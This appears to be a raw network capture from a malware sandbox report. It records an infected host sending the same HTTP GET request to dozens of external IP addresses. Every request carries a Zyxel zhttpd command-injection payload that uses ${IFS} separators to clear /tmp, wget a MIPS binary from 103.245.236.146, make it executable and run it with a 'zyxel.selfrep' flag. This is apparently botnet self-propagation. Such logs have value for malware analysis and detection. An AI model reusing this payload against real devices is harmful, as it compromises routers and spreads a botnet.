                                                Jan 28, 2024 10:16:35.975881100 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7197192.168.2.235372488.214.106.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.975888014 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7198192.168.2.233505257.184.52.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.975918055 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7199192.168.2.2346218128.234.62.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.975969076 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7200192.168.2.2340608203.30.79.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.975976944 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7201192.168.2.2333276166.160.184.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.976005077 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7202192.168.2.2344304135.166.51.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.976042032 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7203192.168.2.2353462113.228.158.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.976077080 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7204192.168.2.2356122108.250.203.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.976087093 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7205192.168.2.2352148114.232.130.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.976119995 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7206192.168.2.235336038.72.111.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.976159096 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7207192.168.2.2343056106.6.174.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.976175070 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7208192.168.2.234706853.95.14.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.976212978 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7209192.168.2.2357974150.33.161.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.976238966 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7210192.168.2.235730888.171.161.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.976262093 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7211192.168.2.2354198169.104.61.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.976265907 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7212192.168.2.2356258192.221.76.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.976313114 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7213192.168.2.2343748211.107.3.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.976329088 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7214192.168.2.234803485.8.17.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.976363897 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7215192.168.2.2340454147.28.22.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.976417065 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7216192.168.2.235734824.105.99.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.976423025 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7217192.168.2.2336996143.237.129.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.976454020 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7218192.168.2.2334610188.159.145.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.976475000 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7219192.168.2.2360034164.206.253.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.976505995 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7220192.168.2.2334460202.40.85.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.976533890 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7221192.168.2.235233219.252.88.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.976547956 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7222192.168.2.2332840107.199.148.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.976571083 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7223192.168.2.233921214.140.0.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.976614952 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7224192.168.2.235470288.5.132.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.976636887 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7225192.168.2.2334800220.231.97.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.976665020 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7226192.168.2.234422859.185.37.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.976716042 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7227192.168.2.2351394176.164.88.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.976732016 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7228192.168.2.235617653.57.29.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.976783991 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7229192.168.2.234127274.15.189.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.976802111 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7230192.168.2.2341954104.196.214.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.976818085 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7231192.168.2.2350368173.195.180.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.976844072 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7232192.168.2.234645258.179.42.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.976890087 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7233192.168.2.2335012132.144.114.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.976911068 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7234192.168.2.234745275.226.43.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.976921082 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7235192.168.2.234112820.99.203.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.976946115 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7236192.168.2.234118871.36.168.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.976978064 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7237192.168.2.2359394178.199.139.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.977022886 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7238192.168.2.234337446.128.249.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.977021933 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7239192.168.2.235778843.127.228.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.977058887 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7240192.168.2.2357688138.169.190.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.977070093 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7241192.168.2.235882686.36.250.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.977118969 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7242192.168.2.2359840221.166.77.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.977140903 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7243192.168.2.2338082192.211.142.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.977174997 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7244192.168.2.2351786202.166.208.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.977243900 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7245192.168.2.2335178131.164.231.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.977273941 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7246192.168.2.235992047.231.92.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.977286100 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7247192.168.2.2356482121.61.60.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.977318048 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7248192.168.2.2346586151.46.214.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.977324009 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7249192.168.2.2342218120.235.96.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.977343082 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7250192.168.2.2354226174.160.82.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.977387905 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7251192.168.2.2345234137.120.12.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.977422953 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7252192.168.2.2342954128.67.192.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.977442026 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7253192.168.2.2356488189.16.118.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.977468967 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7254192.168.2.2353884195.84.83.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.977499962 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7255192.168.2.234049460.47.49.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.977524042 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7256192.168.2.233493440.53.177.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.977571964 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7257192.168.2.2343340177.30.187.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.977592945 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7258192.168.2.2341878149.244.48.235443
                                                TimestampBytes transferredDirectionData
